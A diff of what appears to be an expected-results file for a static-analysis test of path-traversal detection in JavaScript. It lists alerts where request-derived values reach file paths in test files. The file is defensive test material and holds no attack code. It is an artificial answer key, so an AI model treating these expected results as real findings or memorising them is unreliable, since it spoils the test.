-| typescript.ts:9:7:9:48 | path | semmle.label | path | -| typescript.ts:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| typescript.ts:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| typescript.ts:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| typescript.ts:9:24:9:30 | req.url | semmle.label | req.url | -| typescript.ts:12:29:12:32 | path | semmle.label | path | -| typescript.ts:20:7:20:18 | path3 | semmle.label | path3 | -| typescript.ts:20:15:20:18 | path | semmle.label | path | -| typescript.ts:21:39:21:43 | path3 | semmle.label | path3 | -| typescript.ts:23:7:23:18 | path4 | semmle.label | path4 | -| typescript.ts:23:15:23:18 | path | semmle.label | path | -| typescript.ts:24:39:24:43 | path4 | semmle.label | path4 | -| typescript.ts:30:7:30:18 | path6 | semmle.label | path6 | -| typescript.ts:30:15:30:18 | path | semmle.label | path | -| typescript.ts:32:29:32:33 | path6 | semmle.label | path6 | -| views.js:1:43:1:55 | req.params[0] | semmle.label | req.params[0] | +#select +| TaintedPath-es6.js:9:26:9:45 | join("public", path) | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:9:26:9:45 | join("public", path) | This path depends on a $@. | TaintedPath-es6.js:7:20:7:26 | req.url | user-provided value | +| TaintedPath.js:11:29:11:32 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:11:29:11:32 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:13:29:13:48 | "/home/user/" + path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:13:29:13:48 | "/home/user/" + path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:16:33:16:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:16:33:16:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:19:33:19:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:19:33:19:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:22:33:22:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:22:33:22:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:31:31:31:34 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:31:31:31:34 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:39:29:39:52 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:39:29:39:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:42:29:42:49 | pathMod ... n(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:42:29:42:49 | pathMod ... n(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:44:29:44:54 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:44:29:44:54 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:45:29:45:56 | pathMod ... , path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:45:29:45:56 | pathMod ... , path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:47:29:47:52 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:47:29:47:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:49:29:49:61 | pathMod ... h(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:49:29:49:61 | pathMod ... h(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:54:31:54:76 | require ... ).query | TaintedPath.js:54:63:54:69 | req.url | TaintedPath.js:54:31:54:76 | require ... ).query | This path depends on a $@. | TaintedPath.js:54:63:54:69 | req.url | user-provided value | +| TaintedPath.js:55:31:55:74 | require ... ).query | TaintedPath.js:55:61:55:67 | req.url | TaintedPath.js:55:31:55:74 | require ... ).query | This path depends on a $@. | TaintedPath.js:55:61:55:67 | req.url | user-provided value | +| TaintedPath.js:56:31:56:73 | require ... ).query | TaintedPath.js:56:60:56:66 | req.url | TaintedPath.js:56:31:56:73 | require ... ).query | This path depends on a $@. | TaintedPath.js:56:60:56:66 | req.url | user-provided value | +| TaintedPath.js:64:48:64:60 | req.params[0] | TaintedPath.js:64:48:64:60 | req.params[0] | TaintedPath.js:64:48:64:60 | req.params[0] | This path depends on a $@. | TaintedPath.js:64:48:64:60 | req.params[0] | user-provided value | +| TaintedPath.js:75:28:75:48 | fs.real ... c(path) | TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:75:28:75:48 | fs.real ... c(path) | This path depends on a $@. | TaintedPath.js:73:23:73:29 | req.url | user-provided value | +| TaintedPath.js:78:45:78:52 | realpath | TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:78:45:78:52 | realpath | This path depends on a $@. | TaintedPath.js:73:23:73:29 | req.url | user-provided value | +| TaintedPath.js:111:23:111:26 | path | TaintedPath.js:109:23:109:29 | req.url | TaintedPath.js:111:23:111:26 | path | This path depends on a $@. | TaintedPath.js:109:23:109:29 | req.url | user-provided value | +| TaintedPath.js:117:19:117:22 | path | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:117:19:117:22 | path | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:121:19:121:33 | split.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:121:19:121:33 | split.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:125:19:125:26 | split[x] | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:125:19:125:26 | split[x] | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:126:19:126:35 | prefix + split[x] | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:126:19:126:35 | prefix + split[x] | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:129:19:129:37 | concatted.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:129:19:129:37 | concatted.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:132:19:132:38 | concatted2.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:132:19:132:38 | concatted2.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:134:19:134:29 | split.pop() | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:134:19:134:29 | split.pop() | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:143:29:143:55 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:143:29:143:55 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:149:29:149:52 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:149:29:149:52 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:150:29:150:53 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:150:29:150:53 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:151:29:151:51 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:151:29:151:51 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:152:29:152:57 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:152:29:152:57 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | TaintedPath.js:176:38:176:44 | req.url | TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | This path depends on a $@. | TaintedPath.js:176:38:176:44 | req.url | user-provided value | +| TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | TaintedPath.js:177:51:177:57 | req.url | TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | This path depends on a $@. | TaintedPath.js:177:51:177:57 | req.url | user-provided value | +| TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | TaintedPath.js:179:44:179:50 | req.url | TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | This path depends on a $@. | TaintedPath.js:179:44:179:50 | req.url | user-provided value | +| TaintedPath.js:185:31:185:34 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:185:31:185:34 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:186:45:186:48 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:186:45:186:48 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:187:35:187:38 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:187:35:187:38 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:195:29:195:85 | path.re ... '), '') | TaintedPath.js:191:24:191:30 | req.url | TaintedPath.js:195:29:195:85 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:191:24:191:30 | req.url | user-provided value | +| TaintedPath.js:202:29:202:68 | path.re ... '), '') | TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:202:29:202:68 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:200:24:200:30 | req.url | user-provided value | +| TaintedPath.js:205:31:205:69 | path.re ... '), '') | TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:205:31:205:69 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:200:24:200:30 | req.url | user-provided value | +| TaintedPath.js:214:29:214:42 | improperEscape | TaintedPath.js:212:24:212:30 | req.url | TaintedPath.js:214:29:214:42 | improperEscape | This path depends on a $@. | TaintedPath.js:212:24:212:30 | req.url | user-provided value | +| TaintedPath.js:216:29:216:43 | improperEscape2 | TaintedPath.js:212:24:212:30 | req.url | TaintedPath.js:216:29:216:43 | improperEscape2 | This path depends on a $@. | TaintedPath.js:212:24:212:30 | req.url | user-provided value | +| examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | This path depends on a $@. | examples/TaintedPath.js:8:28:8:34 | req.url | user-provided value | +| express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | This path depends on a $@. | express.js:8:20:8:32 | req.query.bar | user-provided value | +| handlebars.js:11:32:11:39 | filePath | handlebars.js:29:46:29:60 | req.params.path | handlebars.js:11:32:11:39 | filePath | This path depends on a $@. | handlebars.js:29:46:29:60 | req.params.path | user-provided value | +| handlebars.js:15:25:15:32 | filePath | handlebars.js:43:15:43:29 | req.params.path | handlebars.js:15:25:15:32 | filePath | This path depends on a $@. | handlebars.js:43:15:43:29 | req.params.path | user-provided value | +| hapi.js:15:44:15:51 | filepath | hapi.js:14:30:14:51 | request ... ilepath | hapi.js:15:44:15:51 | filepath | This path depends on a $@. | hapi.js:14:30:14:51 | request ... ilepath | user-provided value | +| more-fs-extra.js:10:15:10:22 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:10:15:10:22 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:11:11:11:18 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:11:11:11:18 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:12:14:12:21 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:12:14:12:21 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:13:18:13:25 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:13:18:13:25 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:14:11:14:18 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:14:11:14:18 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:15:21:15:28 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:15:21:15:28 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:16:21:16:28 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:16:21:16:28 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:17:31:17:38 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:17:31:17:38 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:18:15:18:22 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:18:15:18:22 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:19:25:19:32 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:19:25:19:32 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:20:21:20:28 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:20:21:20:28 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:21:17:21:24 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:21:17:21:24 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:22:16:22:23 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:22:16:22:23 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:23:20:23:27 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:23:20:23:27 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:24:19:24:26 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:24:19:24:26 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:25:15:25:22 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:25:15:25:22 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:26:19:26:26 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:26:19:26:26 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:27:13:27:20 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:27:13:27:20 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:28:17:28:24 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:28:17:28:24 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:29:23:29:30 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:29:23:29:30 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:30:16:30:23 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:30:16:30:23 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:31:20:31:27 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:31:20:31:27 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| more-fs-extra.js:32:23:32:30 | filename | more-fs-extra.js:8:26:8:33 | req.body | more-fs-extra.js:32:23:32:30 | filename | This path depends on a $@. | more-fs-extra.js:8:26:8:33 | req.body | user-provided value | +| normalizedPaths.js:13:19:13:22 | path | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:13:19:13:22 | path | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | +| normalizedPaths.js:14:19:14:29 | './' + path | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:14:19:14:29 | './' + path | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | +| normalizedPaths.js:15:19:15:38 | path + '/index.html' | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:15:19:15:38 | path + '/index.html' | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | +| normalizedPaths.js:16:19:16:53 | pathMod ... .html') | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:16:19:16:53 | pathMod ... .html') | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | +| normalizedPaths.js:17:19:17:57 | pathMod ... , path) | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:17:19:17:57 | pathMod ... , path) | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | +| normalizedPaths.js:23:19:23:22 | path | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:23:19:23:22 | path | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | +| normalizedPaths.js:24:19:24:29 | './' + path | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:24:19:24:29 | './' + path | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | +| normalizedPaths.js:25:19:25:38 | path + '/index.html' | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:25:19:25:38 | path + '/index.html' | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | +| normalizedPaths.js:26:19:26:53 | pathMod ... .html') | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:26:19:26:53 | pathMod ... .html') | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | +| normalizedPaths.js:27:19:27:57 | pathMod ... , path) | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:27:19:27:57 | pathMod ... , path) | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | +| normalizedPaths.js:36:19:36:22 | path | normalizedPaths.js:31:35:31:48 | req.query.path | normalizedPaths.js:36:19:36:22 | path | This path depends on a $@. | normalizedPaths.js:31:35:31:48 | req.query.path | user-provided value | +| normalizedPaths.js:41:21:41:24 | path | normalizedPaths.js:31:35:31:48 | req.query.path | normalizedPaths.js:41:21:41:24 | path | This path depends on a $@. | normalizedPaths.js:31:35:31:48 | req.query.path | user-provided value | +| normalizedPaths.js:59:19:59:22 | path | normalizedPaths.js:54:35:54:48 | req.query.path | normalizedPaths.js:59:19:59:22 | path | This path depends on a $@. | normalizedPaths.js:54:35:54:48 | req.query.path | user-provided value | +| normalizedPaths.js:63:19:63:38 | path + "/index.html" | normalizedPaths.js:54:35:54:48 | req.query.path | normalizedPaths.js:63:19:63:38 | path + "/index.html" | This path depends on a $@. | normalizedPaths.js:54:35:54:48 | req.query.path | user-provided value | +| normalizedPaths.js:68:21:68:24 | path | normalizedPaths.js:54:35:54:48 | req.query.path | normalizedPaths.js:68:21:68:24 | path | This path depends on a $@. | normalizedPaths.js:54:35:54:48 | req.query.path | user-provided value | +| normalizedPaths.js:78:22:78:25 | path | normalizedPaths.js:73:42:73:55 | req.query.path | normalizedPaths.js:78:22:78:25 | path | This path depends on a $@. | normalizedPaths.js:73:42:73:55 | req.query.path | user-provided value | +| normalizedPaths.js:87:29:87:32 | path | normalizedPaths.js:82:14:82:27 | req.query.path | normalizedPaths.js:87:29:87:32 | path | This path depends on a $@. | normalizedPaths.js:82:14:82:27 | req.query.path | user-provided value | +| normalizedPaths.js:90:31:90:34 | path | normalizedPaths.js:82:14:82:27 | req.query.path | normalizedPaths.js:90:31:90:34 | path | This path depends on a $@. | normalizedPaths.js:82:14:82:27 | req.query.path | user-provided value | +| normalizedPaths.js:99:29:99:32 | path | normalizedPaths.js:94:35:94:48 | req.query.path | normalizedPaths.js:99:29:99:32 | path | This path depends on a $@. | normalizedPaths.js:94:35:94:48 | req.query.path | user-provided value | +| normalizedPaths.js:119:19:119:22 | path | normalizedPaths.js:117:30:117:43 | req.query.path | normalizedPaths.js:119:19:119:22 | path | This path depends on a $@. | normalizedPaths.js:117:30:117:43 | req.query.path | user-provided value | +| normalizedPaths.js:120:19:120:53 | pathMod ... .html') | normalizedPaths.js:117:30:117:43 | req.query.path | normalizedPaths.js:120:19:120:53 | pathMod ... .html') | This path depends on a $@. | normalizedPaths.js:117:30:117:43 | req.query.path | user-provided value | +| normalizedPaths.js:135:21:135:24 | path | normalizedPaths.js:130:35:130:48 | req.query.path | normalizedPaths.js:135:21:135:24 | path | This path depends on a $@. | normalizedPaths.js:130:35:130:48 | req.query.path | user-provided value | +| normalizedPaths.js:144:21:144:24 | path | normalizedPaths.js:139:48:139:61 | req.query.path | normalizedPaths.js:144:21:144:24 | path | This path depends on a $@. | normalizedPaths.js:139:48:139:61 | req.query.path | user-provided value | +| normalizedPaths.js:151:21:151:24 | path | normalizedPaths.js:148:44:148:57 | req.query.path | normalizedPaths.js:151:21:151:24 | path | This path depends on a $@. | normalizedPaths.js:148:44:148:57 | req.query.path | user-provided value | +| normalizedPaths.js:153:21:153:24 | path | normalizedPaths.js:148:44:148:57 | req.query.path | normalizedPaths.js:153:21:153:24 | path | This path depends on a $@. | normalizedPaths.js:148:44:148:57 | req.query.path | user-provided value | +| normalizedPaths.js:165:19:165:22 | path | normalizedPaths.js:160:35:160:48 | req.query.path | normalizedPaths.js:165:19:165:22 | path | This path depends on a $@. | normalizedPaths.js:160:35:160:48 | req.query.path | user-provided value | +| normalizedPaths.js:170:21:170:24 | path | normalizedPaths.js:160:35:160:48 | req.query.path | normalizedPaths.js:170:21:170:24 | path | This path depends on a $@. | normalizedPaths.js:160:35:160:48 | req.query.path | user-provided value | +| normalizedPaths.js:184:19:184:22 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:184:19:184:22 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:187:21:187:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:187:21:187:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:189:21:189:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:189:21:189:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:192:21:192:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:192:21:192:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:194:21:194:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:194:21:194:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:199:21:199:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:199:21:199:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:205:21:205:34 | normalizedPath | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:205:21:205:34 | normalizedPath | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:208:21:208:34 | normalizedPath | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:208:21:208:34 | normalizedPath | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:210:21:210:34 | normalizedPath | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:210:21:210:34 | normalizedPath | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:222:21:222:24 | path | normalizedPaths.js:214:35:214:48 | req.query.path | normalizedPaths.js:222:21:222:24 | path | This path depends on a $@. | normalizedPaths.js:214:35:214:48 | req.query.path | user-provided value | +| normalizedPaths.js:228:21:228:24 | path | normalizedPaths.js:226:35:226:48 | req.query.path | normalizedPaths.js:228:21:228:24 | path | This path depends on a $@. | normalizedPaths.js:226:35:226:48 | req.query.path | user-provided value | +| normalizedPaths.js:238:19:238:22 | path | normalizedPaths.js:236:33:236:46 | req.query.path | normalizedPaths.js:238:19:238:22 | path | This path depends on a $@. | normalizedPaths.js:236:33:236:46 | req.query.path | user-provided value | +| normalizedPaths.js:245:21:245:24 | path | normalizedPaths.js:236:33:236:46 | req.query.path | normalizedPaths.js:245:21:245:24 | path | This path depends on a $@. | normalizedPaths.js:236:33:236:46 | req.query.path | user-provided value | +| normalizedPaths.js:250:21:250:24 | path | normalizedPaths.js:236:33:236:46 | req.query.path | normalizedPaths.js:250:21:250:24 | path | This path depends on a $@. | normalizedPaths.js:236:33:236:46 | req.query.path | user-provided value | +| normalizedPaths.js:256:19:256:22 | path | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:256:19:256:22 | path | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | +| normalizedPaths.js:262:21:262:24 | path | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:262:21:262:24 | path | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | +| normalizedPaths.js:270:21:270:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:270:21:270:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | +| normalizedPaths.js:278:21:278:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:278:21:278:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | +| normalizedPaths.js:286:21:286:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:286:21:286:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | +| normalizedPaths.js:296:21:296:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:296:21:296:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | +| normalizedPaths.js:304:18:304:21 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:304:18:304:21 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | +| normalizedPaths.js:309:19:309:22 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:309:19:309:22 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | +| normalizedPaths.js:313:19:313:22 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:313:19:313:22 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | +| normalizedPaths.js:316:19:316:22 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:316:19:316:22 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | +| normalizedPaths.js:325:19:325:32 | normalizedPath | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:325:19:325:32 | normalizedPath | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | +| normalizedPaths.js:332:19:332:32 | normalizedPath | normalizedPaths.js:303:13:303:26 